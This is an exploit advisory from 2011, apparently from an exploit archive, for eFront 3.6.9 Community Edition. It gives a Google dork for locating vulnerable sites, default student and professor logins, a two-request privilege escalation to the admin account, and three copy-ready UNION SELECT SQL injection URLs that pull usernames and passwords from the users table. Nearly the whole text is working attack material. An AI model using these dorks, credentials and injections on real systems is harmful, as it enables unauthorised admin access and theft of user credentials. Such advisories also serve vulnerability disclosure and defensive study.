# Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities# G

1. # Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities
2. # Google Dork: "eFront (version 3.6.9)" inurl:index.php?ctg=*
3. # Date: 5/09/2011
4. # Public release: When 3.6.10 will be released
5. # Author: IHTeam
6. # Software Link: http://www.efrontlearning.net/download/download-efront.html
7. # Tested on: efront_3.6.9_build11018
8. # Original Advisory: http://iht.li/FWh
9. # Advisory code: http://iht.li/p/0VV
10.  
11. Default username and password:
12. student:student
13. professor:professor
14.  
15. How to become admin:
16. Request 1: /change_account.php?login=admin
17. Request 2: /userpage.php
18. OR
19. simple use the [Switch account] option on top of the page;
20. Now you are in admin area;
21.  
22. SQL Injection:
23. www/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
24. www/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
25. www/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
26.  
27.  
28. # [2011-10-07]
29.